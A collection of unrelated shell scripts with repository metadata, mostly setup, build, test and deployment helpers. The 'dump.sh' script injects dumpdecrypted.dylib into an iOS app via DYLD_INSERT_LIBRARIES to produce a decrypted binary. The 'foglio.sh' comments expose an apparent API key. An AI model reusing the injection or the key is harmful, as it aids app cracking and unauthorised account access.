52019e5c6da9047ed2356e9c1874a35234bdc884 | Shell | JuniorFreitas/dnlaravel | /start.sh | UTF-8 | 698 | 2.671875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Bootstrap a fresh Laravel project inside the docker setup.
# `echo -e` is required: bash's plain `echo` prints "\033" literally
# instead of emitting the ANSI colour escape.
echo -e "\033[1;32mDocker com NGINX, Laravel, PHP7.2, Redis e MARIADB - Dynamus TI 2018 \033[0m"
echo Download Laravel
php ./docker/utils/composer create-project --prefer-dist laravel/laravel application
echo Copiando arquivo de configuração .env
cp ./docker/utils/.env ./application/.env
echo Copiando composer
mkdir ./application/bin
cp ./docker/utils/composer ./application/bin/composer
echo Instalando as dependencias
php ./application/bin/composer install
echo Generate key
cd application
php artisan key:generate
echo Startando containers
cd ..
docker-compose up -d
echo "\033[1;32mFim! Dúvidas consulte a documentação https://github.com/JuniorFreitas/dnlaravel \033[0m" | true |
767cebdfe391f85177fe12a40d7013c91ae029ab | Shell | giulianoc/CatraMMS | /scripts/examples/addSerieCChannels/foglio.sh | UTF-8 | 517 | 3.234375 | 3 | [] | no_license | #!/bin/bash
# Require exactly four positional arguments.
if [ $# -ne 4 ];
then
echo "Usage $0 <tsv path name> <userKey> <apiKey> <mmsAPIHostname> (i.e.: 40 702347803978348... mms-api.cloud-mms.com)"
exit 1
fi
tsvPathName=$1
#for seriec: 1
userKey=$2
#for seriec: 1j1f1C1f1l1e1r1u1w1y111f1r1p1b1b1V1H1S1b1b191418091909170916
apiKey=$3
#for seriec: mms-api.restream.ovh
mmsApiHostname=$4
# Hand everything to the awk program; -v exposes each value as an awk
# variable while seriec.awk processes the TSV channel list.
awk -v userKey=$userKey -v apiKey=$apiKey -v mmsApiHostname=$mmsApiHostname -f ./utility/seriec.awk $tsvPathName
| true |
490c54975167db1e14e6d56ca09d322f6f93cfc3 | Shell | kubernetes-sigs/kustomize | /releasing/compile-changelog.sh | UTF-8 | 2,733 | 4.03125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Copyright 2022 The Kubernetes Authors.
# SPDX-License-Identifier: Apache-2.0
#
# Builds a PR-oriented changelog from the git history for the given module.
#
# Usage (from top of repo):
#
# releasing/compile-changelog.sh MODULE TAG CHANGE_LOG_FILE
#
# Where TAG is in the form
#
# api/v1.2.3
# kustomize/v1.2.3
# cmd/config/v1.2.3
# ... etc.
#
set -o errexit
set -o nounset
set -o pipefail
if [[ -z "${1-}" ]] || [[ -z "${2-}" ]]; then
echo "Usage: $0 <module> <fullTag> <changeLogFile>"
echo "Example: $0 kyaml kyaml/v0.13.4 changelog.txt"
exit 1
fi
module=$1
fullTag=$2
changeLogFile="${3:-}"
# Find previous tag that matches the tags module
allTags=$(git tag -l "$module*" --sort=-version:refname --no-contains="$fullTag")
prevTag=$(echo "$allTags" | head -n 1)
echo "Compiling $module changes from $prevTag to $fullTag"
commits=( $(git log "$prevTag".."$fullTag" \
--pretty=format:'%H' \
--abbrev-commit --no-decorate --no-color --no-merges \
-- "$module") )
echo "Gathering PRs for commits: ${commits[*]}"
# There is a 256 character limit on the query parameter for the GitHub API, so split into batches then deduplicate results
batchSize=5
results=""
for((i=0; i < ${#commits[@]}; i+=batchSize))
do
commitList=$(IFS="+"; echo "${commits[@]:i:batchSize}" | sed 's/ /+/g')
if [[ -z "${GITHUB_TOKEN-}" ]]; then
echo "WARNING: Please set GITHUB_TOKEN to avoid GitHub API rate limits."
if ! newResultsRaw=$(curl -sSL "https://api.github.com/search/issues?q=$commitList+repo%3Akubernetes-sigs%2Fkustomize+is:pull-request"); then
echo "Failed to fetch results for commits (exit code $?): $commitList"
exit 1
fi
else
if ! newResultsRaw=$(curl -sSL "https://api.github.com/search/issues?q=$commitList+repo%3Akubernetes-sigs%2Fkustomize+is:pull-request" -H "Authorization: Bearer $GITHUB_TOKEN"); then
echo "Failed to fetch results for commits (exit code $?): $commitList"
exit 1
fi
fi
if [[ "${newResultsRaw}" == *"API rate limit exceeded"* ]]; then
echo "GitHub API rate limit exceeded. Please set GITHUB_TOKEN to avoid this."
exit 1
fi
if [[ "${newResultsRaw}" == *"\"items\":"* ]] ; then
newResults=$(echo "$newResultsRaw" | jq -r '[ .items[] | { number, title } ]')
results=$(echo "$results" "$newResults" | jq -s '.[0] + .[1] | unique')
else
echo "Request for commits $commitList returned invalid results"
exit 1
fi
done
changelog=$(echo "${results}" | jq -r '.[] | select( .title | startswith("Back to development mode") | not) | "#\(.number): \(.title)" ')
if [[ -n "$changeLogFile" ]]; then
echo "$changelog" > "$changeLogFile"
else
echo
echo "----CHANGE LOG----"
echo "$changelog"
fi
| true |
e022a7e865a9f92848a0822aed42e577f928c5fa | Shell | zhangxin0518/linux-help | /linux-help.sh | UTF-8 | 1,246 | 2.671875 | 3 | [] | no_license | #!/bin/bash
#============================================================
# Package-source list file for apt (translated: "software download and
# install source list file").
sudo gedit /etc/apt/sources.list
# Refresh the package index from the configured sources.
sudo apt-get update
# Upgrade installed packages according to the source list.
sudo apt-get upgrade
# Force (re)installation of the Ubuntu Software Center.
sudo apt-get install --reinstall software-center
#============================================================
# Show kernel / system information.
uname -a
# List PCI devices.
lspci
# List USB devices.
lsusb
# Network configuration commands.
ifconfig -a
sudo gedit /etc/network/interfaces
/etc/init.d/networking restart
sudo ifconfig eth0 down
sudo ifconfig eth0 up
# Inspect and extend PATH (binary search path).
echo $PATH
在/etc/profile中加下面这个命令
# (note: the line above is prose, not a command — it says: add the
# following line to /etc/profile)
export PATH=$PATH:/home/your_path
source /etc/profile
# Debian package management for .deb packages.
sudo dpkg -i #安装软件包
sudo dpkg -r #卸载软件包
# Configure dynamic-library search paths.
cd /etc/ld.so.conf.d/
sudo gedit name.conf
sudo ldconfig
其中动态库缓存文件为: /etc/ld.so.cache
# (note: the line above is prose — it says: the dynamic-library cache
# file is /etc/ld.so.cache)
# Change the machine's hostname.
sudo gedit /etc/hostname
sudo ./etc/hostname
# Wi-Fi firmware path and setup.
sudo cp -i iwlwifi-9000-pu-b0-jf-b0-34.ucode /lib/firmware
sudo update-grub
sudo reboot
9cc12538238a306837d8e12da3d2d26399b3f263 | Shell | zackharley/CMPE327 | /test.sh | UTF-8 | 2,073 | 3.75 | 4 | [] | no_license | #!/usr/bin/env bash
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case ${key} in
-f|--frontend)
FRONTEND="$2"
shift # past argument
shift # past value
;;
-b|--backend)
BACKEND="$2"
shift # past argument
shift # past value
;;
-o|--output)
OUTPUT="$2"
shift # past argument
shift # past value
;;
esac
done
TIMESTAMP=$(date "+%Y.%m.%d-%H.%M.%S")
if ! [ ${OUTPUT} ]; then
OUTPUT="frontend/test/logs/test.${TIMESTAMP}.log"
fi
echo "TEST SESSION -- ${TIMESTAMP}" > ${OUTPUT}
echo "" >> ${OUTPUT}
if ! [[ ${FRONTEND} || ${BACKEND} ]]; then
echo "You must supply a path to at least a frontend or backend test folder"
exit
fi
if [ ${FRONTEND} ]; then
for folder in $( ls ${FRONTEND} ); do
for file in $( find ${FRONTEND}/${folder} -name "*.input.txt" -print0 | xargs -0 ls); do
echo "###### Running test ${file} ######" >> ${OUTPUT}
ACCOUNTS_FILE=$(echo ${file} | awk -F'[.]' '{print $1}' ).accounts.txt
OUTPUT_FILE_NAME=$(echo ${file} | awk -F'[.]' '{print $1}').output.txt
OUTPUT_FILE=$(find ${FRONTEND}/${folder} -name "$(echo ${OUTPUT_FILE_NAME} | awk -F'[/]' '{print $4}')")
python3 -m frontend ${ACCOUNTS_FILE} ${file} >> ${OUTPUT} 2>&1
echo "" >> ${OUTPUT}
TEST_NAME=$(echo ${file} | awk -F'[.]' '{print $1}' | awk -F'[/]' '{print $4}')
SUMMARY_FILE=$(find frontend/sessions -name "*.${TEST_NAME}.txt" -print0 | xargs -0 ls -t | head -1)
if [ ${OUTPUT_FILE} ]; then
echo "###### comparing ${SUMMARY_FILE} ${OUTPUT_FILE}"
if cmp -b -s ${SUMMARY_FILE} ${OUTPUT_FILE}; then
echo "The files match"
else
echo "The files are different"
fi
diff ${SUMMARY_FILE} ${OUTPUT_FILE}
echo ""
fi
done
done
# Diff output files and logs
fi
if [ ${BACKEND} ]; then
cd ${BACKEND}
pwd
# loop here
fi
echo "done" | true |
aacfea3dd69bc5ccd14bf3fcb8f84c142d895578 | Shell | msys2/MINGW-packages | /mingw-w64-libftdi/PKGBUILD | UTF-8 | 2,235 | 3 | 3 | [
"BSD-3-Clause"
] | permissive | # Maintainer: David Grayson <davidegrayson@gmail.com>
_realname=libftdi
pkgbase=mingw-w64-${_realname}
pkgname="${MINGW_PACKAGE_PREFIX}-${_realname}"
pkgver=1.5
pkgrel=5
pkgdesc='Library to talk to FTDI chips, with Python 3 bindings (mingw-w64)'
arch=('any')
mingw_arch=('mingw32' 'mingw64' 'ucrt64' 'clang64' 'clangarm64' 'clang32')
url="https://www.intra2net.com/en/developer/libftdi/"
license=('LGPL', 'GPL')
makedepends=("${MINGW_PACKAGE_PREFIX}-cmake"
"${MINGW_PACKAGE_PREFIX}-boost"
"${MINGW_PACKAGE_PREFIX}-swig"
"${MINGW_PACKAGE_PREFIX}-python"
"${MINGW_PACKAGE_PREFIX}-cc")
depends=("${MINGW_PACKAGE_PREFIX}-libusb"
"${MINGW_PACKAGE_PREFIX}-confuse"
"${MINGW_PACKAGE_PREFIX}-gettext"
"${MINGW_PACKAGE_PREFIX}-libiconv")
optdepends=("${MINGW_PACKAGE_PREFIX}-python: Python bindings to libftdi")
options=('staticlibs' 'strip')
source=("https://www.intra2net.com/en/developer/libftdi/download/libftdi1-${pkgver}.tar.bz2"
"0001-cmake-fix-libdir.patch")
sha256sums=('7c7091e9c86196148bd41177b4590dccb1510bfe6cea5bf7407ff194482eb049'
'71d5a8de43a61c7e26531c722862dc7c4135e4b494498d2bd140019f9693741c')
prepare() {
cd ${_realname}1-${pkgver}
patch -p1 -i "${srcdir}/0001-cmake-fix-libdir.patch"
}
build() {
rm -rf "${srcdir}/build-${MINGW_CHOST}"
mkdir -p "${srcdir}/build-${MINGW_CHOST}"
cd "${srcdir}/build-${MINGW_CHOST}"
MSYS2_ARG_CONV_EXCL="-DCMAKE_INSTALL_PREFIX=" \
${MINGW_PREFIX}/bin/cmake \
-G"MSYS Makefiles" \
-DCMAKE_INSTALL_PREFIX="${MINGW_PREFIX}" \
-DCMAKE_BUILD_TYPE=Release \
-DEXAMPLES=OFF \
-DPYTHON_BINDINGS=ON \
-DLINK_PYTHON_LIBRARY=ON \
-DDOCUMENTATION=OFF \
"../${_realname}1-${pkgver}/"
make
}
# Run the test suite from the build tree; `|| true` deliberately makes a
# failing `make check` non-fatal so packaging can proceed.
check() {
cd "${srcdir}/build-${MINGW_CHOST}"
PATH=$PATH:"${srcdir}/build-${MINGW_CHOST}/src" make check || true
}
package() {
cd "${srcdir}/build-${MINGW_CHOST}"
make DESTDIR="${pkgdir}" install
cd "${srcdir}/${_realname}1-${pkgver}"
mkdir -p "${pkgdir}${MINGW_PREFIX}/share/licenses/${_realname}"
cp COPYING* "${pkgdir}${MINGW_PREFIX}/share/licenses/${_realname}"
sed -i "s;$(cygpath -m /);/;" \
"${pkgdir}${MINGW_PREFIX}/lib/cmake/${_realname}1"/*.cmake
}
| true |
ee8510076fd2ae8d64427b926cad80f791a39d2f | Shell | matthewfeickert/dotfiles | /.bashrc_user | UTF-8 | 3,855 | 3.4375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/env bash
# Add temporary PATH modification until next load of .profile
if [ -f "/tmp/.profile" ]; then
. /tmp/.profile
fi
if [ -f "/tmp/.bash_profile" ]; then
. /tmp/.bash_profile
fi
# Avoid CVE-2022-24765
# c.f. https://github.blog/2022-04-12-git-security-vulnerability-announced/
export GIT_CEILING_DIRECTORIES="/home"
# Enable .pythonrc.py
if [ -f "${HOME}/.pythonrc.py" ]; then
export PYTHONSTARTUP="${HOME}/.pythonrc.py"
fi
# Ensure that pip can't install outside a virtual environment
export PIP_REQUIRE_VIRTUALENV=true
# Ensure local virtualenv setup
if [ ! -f "${HOME}/opt/venv/bin/virtualenv" ]; then
curl -sL --location --output /tmp/virtualenv.pyz https://bootstrap.pypa.io/virtualenv.pyz
python3 /tmp/virtualenv.pyz ~/opt/venv
~/opt/venv/bin/pip install --upgrade pip
~/opt/venv/bin/pip install virtualenv
mkdir -p ~/bin # Ensure exists if new machine
ln -s ~/opt/venv/bin/virtualenv ~/bin/virtualenv
fi
# Add pyenv
if [ -d "${HOME}/.pyenv/bin" ]; then
eval "$(pyenv init -)"
# Place pyenv shims on path
if [[ ":${PATH}:" != *":$(pyenv root)/shims:"* ]]; then
eval "$(pyenv init --path)"
fi
if [ -d "${HOME}/.pyenv/plugins/pyenv-virtualenv" ]; then
# Place pyenv-virtualenv shims on path
if [[ ":${PATH}:" != *":$(pyenv root)/plugins/pyenv-virtualenv/shims:"* ]]; then
eval "$(pyenv virtualenv-init -)"
fi
fi
# Allow for prompt updating on venv switch
# c.f. https://github.com/pyenv/pyenv-virtualenv/issues/135#issuecomment-717554081
export PYENV_VIRTUALENV_DISABLE_PROMPT=1
export BASE_PROMPT=$PS1
function updatePrompt {
if [[ "$(pyenv version-name)" != "system" ]]; then
PYENV_VER=$(pyenv version-name) # capture version name in variable
export PS1="(${PYENV_VER%%:*}) "$BASE_PROMPT # grab text prior to first ':' character
else
export PS1=$BASE_PROMPT
fi
}
export PROMPT_COMMAND='updatePrompt'
# default venv
if [ -d "${HOME}/.pyenv/versions/base" ]; then
pyenv activate base
fi
alias deactivate='pyenv deactivate'
fi
# Enable tab completion of Python virtual environments
if [ -f /opt/_venv-activate/_venv-activate.sh ]; then
_VENV_ACTIVATE_HOME="${HOME}/.venvs"
_VENV_ACTIVATE_PYTHON=$(which python3)
. /opt/_venv-activate/_venv-activate.sh
fi
# Enable pipx shell completions
if [ -f "${HOME}/bin/pipx" ]; then
eval "$(register-python-argcomplete pipx)"
fi
# Enable h5ls tab completion
if [ -f /opt/_h5ls/_h5ls.sh ]; then
. /opt/_h5ls/_h5ls.sh
fi
# Add GPG key
export GPG_TTY=$(tty)
# Ensure LD_LIBRARY_PATH exists if application unsets it
if [ -z "${LD_LIBRARY_PATH}" ]; then
LD_LIBRARY_PATH="${_PRESERVE_LD_LIBRARY_PATH}"; export LD_LIBRARY_PATH;
fi
# Ensure EDITOR is set for use by bash's 'edit-and-execute-command'
if [ -z "${EDITOR}" ]; then
export EDITOR="$(command -v vim)"
fi
# User Functions
# c.f. https://gist.github.com/matthewfeickert/498cd93af35b6664caab5dece20342e1
# remember to xhost +
function root-docker () {
local input_path
input_path="${1}"
if [ -z "${input_path}" ]; then
input_path=$(pwd)
fi
if [[ "${input_path}" == "shell" ]]; then
cmd='/bin/bash'
else
if [[ "${input_path::7}" == "root://" ]]; then
# Accessing file over xrootd
file_path="${input_path}"
else
file_path=$(readlink -f ${input_path})
fi
cmd="root -l ${file_path}"
fi
docker run --rm -ti \
-e DISPLAY="${DISPLAY}" \
-v /tmp/.X11-unix:/tmp/.X11-unix \
-v /tmp/"krb5cc_$(id -u ${USER})":/tmp/krb5cc_0 \
-v /tmp/:/tmp/ \
-v "${HOME}":"${HOME}" \
atlasamglab/stats-base:root6.24.06 "${cmd}"
}
| true |
044de32af8afd66a3ad248d4bec1a64c6cae72b2 | Shell | urvishpanchal/shakedown | /bootstrap.sh | UTF-8 | 2,529 | 2.828125 | 3 | [] | no_license | #!/bin/bash
apt-get update
apt-get upgrade -y
apt-get install -y build-essential git
apt-get install -y libfreetype6 libfreetype6-dev pkg-config
apt-get install -y python-dev python-pip
#apt-get install -y redis-server redis-tools
#pip install redis rq --upgrade
pip install six
pip install jinja2
pip install paramiko
pip install git+https://github.com/aristanetworks/arcomm.git
# install scipy stack
apt-get install -y python-numpy python-scipy python-matplotlib ipython \
ipython-notebook python-pandas python-sympy python-nose
#cd /vagrant; python setup.py develop
# install/setup supporting services
apt-get install -y ntp dnsmasq tacacs+ nginx
apt-get install -y syslog-ng syslog-ng-core
if ! grep -q autotest /etc/hosts; then
cat >> /etc/hosts <<EOF
192.168.56.7 shakedown
192.168.56.21 vswitch1
192.168.56.22 vswitch2
192.68.56.6 testrail
EOF
fi
cat > /etc/ntp.conf <<EOF
driftfile /var/lib/ntp/ntp.drift
statistics loopstats peerstats clockstats
filegen loopstats file loopstats type day enable
filegen peerstats file peerstats type day enable
filegen clockstats file clockstats type day enable
server 0.ubuntu.pool.ntp.org iburst
server 1.ubuntu.pool.ntp.org iburst
server 2.ubuntu.pool.ntp.org iburst
server 3.ubuntu.pool.ntp.org iburst
server ntp.ubuntu.com
restrict -4 default kod notrap nomodify nopeer noquery
restrict -6 default kod notrap nomodify nopeer noquery
restrict 127.0.0.1
restrict ::1
restrict 0.0.0.0 mask 0.0.0.0 modify notrap
EOF
cat > /etc/dnsmasq.d/local.conf <<EOF
local=/shakedown/
expand-hosts
domain=shakedown
EOF
cat > /etc/tacacs+/tac_plus.conf <<EOF
key = "shakedown"
accounting file = /var/log/tac_plus.acct
group = admins {
default service = permit
service = exec {
priv-lvl = 15
}
}
group = rousers {
default service = permit
service = exec {
priv-lvl = 1
}
}
user = admin {
member = admins
login = nopassword
}
user = shakedown {
member = admins
login = cleartext shakedown
}
user = rouser {
member = rouser
login = cleartext nocuser
}
EOF
cat > /etc/syslog-ng/conf.d/network.conf <<EOF
options { keep_hostname(yes); };
source s_net { tcp(); udp(); };
filter f_lessnoisy { not (
message("LINEPROTO")
or message("SPANTREE")
);
};
destination d_net { file("/var/log/network"); };
# uncomment this line (and comment out the next one) to discard noisy logs messages
#log { source(s_net); filter(f_lessnoisy); destination(d_net); };
log { source(s_net); destination(d_net); };
EOF
| true |
4801f0f86c0dff69255102f50866cf5309728c9b | Shell | MessaoudiLab/RNA-Seq-Analysis | /Small RNA/small_rna_trimming.sh | UTF-8 | 1,177 | 3.1875 | 3 | [] | no_license | #!/bin/bash -l
fq=$1
shift
#SBATCH --nodes=1
#SBATCH --ntasks=10
#SBATCH --cpus-per-task=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=1-00:15:00 # 1 day and 15 minutes
#SBATCH --output=alignment.stdout
#SBATCH --mail-user=useremail@address.com
#SBATCH --mail-type=ALL
#SBATCH --job-name="small RNA trimming - QIASeq"
#SBATCH -p intel # This is the default partition, you can use any of the following; intel, batch, highmem, gpu
#Load the packages
module load trim_galore
module load fastqc
first="_trimmed.fq.gz"
second="_trimmed_trimmed.fq.gz"
third="_trimmed_trimmed_trimmed.fq.gz"
fourth="_trimmed_trimmed_trimmed_trimmed.fq.gz"
#Trim the small rna adapters. Reads shorter than 18 bp are removed
trim_galore --no_report_file -q 20 --small_rna $fq.fastq.gz
#Trim the 3' adapter.
trim_galore --no_report_file -q 20 --length 0 -a AACTGTAGGCACCATCAAT $fq$first
#Trims the 5' adapter.
trim_galore -q 20 --no_report_file --length 0 -a GATCGTCGGACTGTAGAACTCTGAAC $fq$second
#Finally trim the illumina adapters and reduce the length from 15-30 bp
trim_galore -q 20 --length 15 --max_length 30 --illumina --fastqc $fq$third
rm $fq$first
rm $fq$second
rm $fq$third
mv $fq$fourth $fq$first
| true |
61c4bca9a1b09d81f60a8cd54ea198eb2350a2c7 | Shell | LGDIS/LGDIS-Deploy | /templates/unicorn/unicorn.init.erb.example | UTF-8 | 1,531 | 3.421875 | 3 | [] | no_license | #!/bin/bash
#
# unicorn
#
# chkconfig: - 85 15
# description: unicorn start/stop script.
#
#
# set rvm environment valiables.
#
export PATH=/usr/local/ruby/bin:/var/rails/bagel/current/sbin:$PATH
set -u
set -e
APP_NAME=<%= application %>
APP_ROOT=<%= current_path %>
CNF="<%= deploy_to %>/shared/config/unicorn.conf"
PID="<%= deploy_to %>/shared/pids/unicorn.<%= unicorn_port %>.pid"
ENV=<%= rails_env %>
#UNICORN_OPTS="-D -E $ENV -c $CNF --path /${APP_NAME}"
UNICORN_OPTS="-D -E $ENV -c $CNF"
UNICORN_CMD="bundle exec unicorn "
old_pid="$PID.oldbin"
cd $APP_ROOT || exit 1
sig () {
    # Deliver signal $1 to the master process recorded in $PID; the
    # function's status stays non-zero when the pidfile is missing/empty,
    # which the callers rely on ("Not running" paths).
    [ -s "$PID" ] && kill -"$1" "$(cat "$PID")"
}
oldsig () {
    # Deliver signal $1 to the old (pre-upgrade) master recorded in
    # $old_pid. Quoting fixes the previously unquoted path/PID expansions;
    # the non-zero status for a missing pidfile is preserved.
    test -s "$old_pid" && kill -"$1" "$(cat "$old_pid")"
}
case ${1-help} in
start)
sig 0 && echo >&2 "Already running" && exit 0
cd $APP_ROOT ; $UNICORN_CMD $UNICORN_OPTS
;;
stop)
sig QUIT && exit 0
echo >&2 "Not running"
;;
force-stop)
sig TERM && exit 0
echo >&2 "Not running"
;;
restart|reload)
sig HUP && echo reloaded OK && exit 0
echo >&2 "Couldn't reload, starting instead"
$UNICORN_CMD $UNICORN_OPTS
;;
upgrade)
sig USR2 && exit 0
echo >&2 "Couldn't upgrade, starting instead"
$UNICORN_CMD $UNICORN_OPTS
;;
rotate)
sig USR1 && echo rotated logs OK && exit 0
echo >&2 "Couldn't rotate logs" && exit 1
;;
*)
echo >&2 "Usage: $0 <start|stop|restart|upgrade|rotate|force-stop>"
exit 1
;;
esac
| true |
a8ef8fa03e08219c31a54bf42867dd10aae8e1cd | Shell | Hikari2/myservicebook | /patch-sagui.sh | UTF-8 | 403 | 2.875 | 3 | [] | no_license | #!/bin/bash
# Patch sagui's development server so the dev-server options from
# saguiOptions are merged into webpack-dev-server's options.
DEV_SERVER="src/main/frontend/node_modules/sagui/lib/runner/development-server.js"
PATCH="setupHMR(saguiOptions).webpack), Object.assign(options, saguiOptions.devServer))"
echo "Patching sagui"
cp "${DEV_SERVER}" "${DEV_SERVER}.backup"
# Read the file directly with sed (no useless cat); '|' delimiters avoid
# clashing with the '/' characters inside the replacement text.
sed "s|setupHMR(saguiOptions).webpack), options)|${PATCH}|" "${DEV_SERVER}" > patched-dev-server.js
mv patched-dev-server.js "${DEV_SERVER}"
echo "done"
| true |
68259285a6d259c72ec74d0d8499380791287e37 | Shell | ripley57/CW_Tools | /tools/filetools/join_demos/demo2.sh | UTF-8 | 617 | 3.578125 | 4 | [] | no_license | # demo2.sh
#
#Description:
# Return the lines where the specified column does not only exist
# in the first file.
#
# Note: By default join will condisder the first column in each file.
# Note: The two files must be sorted, by the column being compared.
#
#cat demo2_file1.txt
#1. Asia:
#2. Africa:
#3. Europe:
#4. North America:
#
#cat demo2_file2.txt
#1. India
#3. The Netherlands
#4. The US
#
#Command:
# join -v 1 demo2_file1.txt demo2_file2.txt
#
#Expected result:
#2. Africa:
#
# Note: Similarly, use "-v 2" to see lines that only exist in the
# second file.
# -v 1: suppress joined lines and print only lines of FILE1 whose join
# field (column 1 by default) has no match in FILE2.
join -v 1 demo2_file1.txt demo2_file2.txt
| true |
5ed43221992dd98b8519a27d074c2ded60ddad0a | Shell | vanleiko/unix-course | /guessinggame.sh | UTF-8 | 790 | 3.96875 | 4 | [] | no_license | #!/usr/bin/env bash
function compare_numbers {
read input_num
local number=$(ls | wc -l)
if [[ $input_num = $number ]]
then
result="Correct"
elif [[ $input_num -gt $number ]]
then
result="Greater"
else
result="Lower"
fi
echo $result
}
continue_game="Yes"
echo ">>> Welcome to the Guessing Game! <<<"
echo "Guess how many files are in the current directory?"
while [[ $continue_game = "Yes" ]]
do
output=$(compare_numbers)
if [[ $output = "Correct" ]]
then
echo "Congratulations! Your answer is correct!"
let continue_game="No"
elif [[ $output = "Greater" ]]
then
echo "Your answer was too high! Try again:"
elif [[ $output = "Lower" ]]
then
echo "Your answer was to low... try again:"
fi
done
echo "END OF THE GAME"
echo "Thanks for playing :) "
| true |
500995780673be350f0f86582849be1382e7a420 | Shell | teamonefist/irz-rootfs | /home/httpd/cgi-bin/admin_startup_set.cgi | UTF-8 | 278 | 2.703125 | 3 | [] | no_license | #!/bin/sh /usr/lib/irz-web/setscript
# Persist the submitted startup script (CGI form field "script"),
# stripping DOS carriage returns. `formq` is the router's form-field
# helper provided by the setscript wrapper in the shebang — TODO confirm.
formq script | tr -d '\r' > /mnt/rwfs/settings/startup
# Executable bit doubles as the enabled/disabled flag for the script.
if [ "`formq script_enabled`" = "on" ]; then
chmod 0755 /mnt/rwfs/settings/startup
else
chmod 0644 /mnt/rwfs/settings/startup
fi
echo "<hr><a href=\"admin_startup.cgi\">Return</a>"
| true |
512918aee6b9cc719adb99896cf032ff65688330 | Shell | painless-software/painless-continuous-delivery | /tests/field/include/api/gitlab.sh | UTF-8 | 347 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash -e
#
# GitLab API access helper functions.
gitlab() {
    # Thin wrapper around the GitLab v4 REST API for the configured project.
    #   $1    - HTTP method (GET/POST/PUT/...)
    #   $2    - resource path below the project endpoint
    #   $3... - extra arguments forwarded verbatim to curl
    # Requires GITLAB_PROJECT_NAME and GITLAB_API_TOKEN in the environment.
    COMMAND="$1"
    RESOURCE="$2"
    PROJECT_URL="https://gitlab.com/api/v4/projects/${GITLAB_PROJECT_NAME}"
    set -e
    # "$COMMAND" is quoted: an empty/whitespace method no longer breaks
    # curl's argument parsing.
    curl --silent \
        --header "Authorization: Bearer $GITLAB_API_TOKEN" \
        --request "$COMMAND" \
        "${PROJECT_URL}/${RESOURCE}" "${@:3}"
}
| true |
62ae5dc31643377be64a06c2cbc218eaf5a99ba1 | Shell | JohnSun23/SmartGridProject | /setup.sh | UTF-8 | 841 | 2.921875 | 3 | [] | no_license | #!/bin/bash
ion_username="melkherj"
ion="ion-21-14.sdsc.edu"
# We're not on the io-node on gordon
if [[ `hostname` != *sdsc.edu ]]
then
# For accessing hdfs
export sshion="ssh ${ion_username}@${ion}"
export SMART_GRID_DATA="$(pwd)/../data"
fi
# Smart Grid Compression source directory
export SMART_GRID_SRC=`pwd`
# The hdfs directory containing the oledb_tag_aggregate part files
export hdfs_part_root_dir="/user/melkherj/preprocessed_power_data"
# Directory to store output data. An example: the compressed pandas/pickle files
export compression_data_dir="${SMART_GRID_DATA}/compression"
# The file containing the mapping from tags to files
export part_tag_path="${SMART_GRID_DATA}/summary_data/tag_part_seek"
# The directory containing space/error files
export space_err_dir="${SMART_GRID_DATA}/summary_data/space_errors"
| true |
e5b0d6acd63dbca7172da74d5ca8747d81a8cce1 | Shell | zheng1204/zheng | /12.sh | UTF-8 | 184 | 3 | 3 | [] | no_license | #!/bin/bash
# Sweep 192.168.4.1-254 with one ping each and report reachability.
for i in {1..254}
do
    # Test the command's status directly instead of the `$?` anti-pattern.
    if ping -c1 -i0.1 -W1 "192.168.4.$i" >/dev/null; then
        echo "host 192.168.4.$i is up."
    else
        echo "host 192.168.4.$i is down."
    fi
done
| true |
872b4606bb3f1f282de56be00e0b6ff620cbaac1 | Shell | lgq2015/dumpshell | /dumpshell/dump.sh | UTF-8 | 898 | 3.546875 | 4 | [] | no_license | #判断参数个数
# Require exactly one argument: the executable name of the target app.
if [ $# != 1 ]; then
echo "参数不正确"
echo "本命令只接收一个参数,参数是可执行文件的名称,请这样使用:dump name"
exit
fi
# Locate the app's sandbox: walk every .metadata.plist under
# /var/mobile/Containers/Data/Application/ and keep the first one that
# mentions "$1".
cd /var/mobile/Containers/Data/Application/
for filename in `find . -name '*.metadata.plist'`
do
grep "$1" $filename
if [ $? -eq 0 ]; then
var=$filename
break
fi
done
# Strip the plist filename to get the sandbox directory, then copy the
# dumpdecrypted dylib into its Documents folder.
dir=${var%/*}
documentDir=$dir"/Documents"
echo "document path ----> "$documentDir
echo "copy /var/root/dumpdecrypted.dylib ----> ${documentDir}"
cp /var/root/dumpdecrypted.dylib $documentDir
# Switch into the directory holding dumpdecrypted, find the app binary,
# and launch it with the dylib injected so it writes a decrypted copy.
cd $documentDir
cmdpath=`find /var/containers/Bundle/Application/ -name "*$1"`
echo "---->DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib "$cmdpath
DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib $cmdpath
| true |
ca673b134bbf09534b8a5ff1d4a1f37ac447f5ea | Shell | jdelaporte/dotfiles | /scripts/android-push-music | UTF-8 | 580 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# A quick Linux script to synchronize music with my Droid phone.
# Usage:
#   >sync-droid-music /media/DROID
# Uncomment the following for the first run, if you're on Ubuntu:
# sudo apt-get install rsync
# Move extraneous music files into the Music directory.
# "$1" is quoted everywhere: a mount point containing spaces no longer
# splits into multiple arguments.
mkdir "$1/Music"
mv "$1"/amazonmp3/* "$1/Music"
echo "Moved Amazon MP3s into Music directory."
# Push any music not on the phone.
rsync --recursive --progress \
    ~/Music "$1"
# The flags below are kept for reference; note their trailing backslashes
# are inert inside comments — re-enable them by moving the lines above,
# into the rsync command itself.
#j  --verbose \
#  --exclude "*" \
#$ --include "*.mp3" \
#$ --include "*.m43" \
# --include "*.m3u" \
echo "Music pushed to phone."
80e53d07f10594f9d0c2692880c5aaa12783c32a | Shell | wangqiang8511/docker-elasticsearch-mesos | /etcd_ttl.sh | UTF-8 | 251 | 2.546875 | 3 | [] | no_license | #!/bin/bash
# Defaults, overridable from the environment.
ETCD_SERVER=${ETCD_SERVER:-"http://localhost:4001"}
ES_CLUSTER_NAME=${ES_CLUSTER_NAME:-"test"}
# Heartbeat loop: re-register this host under the cluster's etcd key with
# a 10s TTL every 5s, so the entry expires shortly after the host dies.
while true;
do
curl -L -XPUT "$ETCD_SERVER/v2/keys/es/$ES_CLUSTER_NAME/$(hostname -f)" -d value=$(hostname -i) -d ttl=10
sleep 5
done
| true |
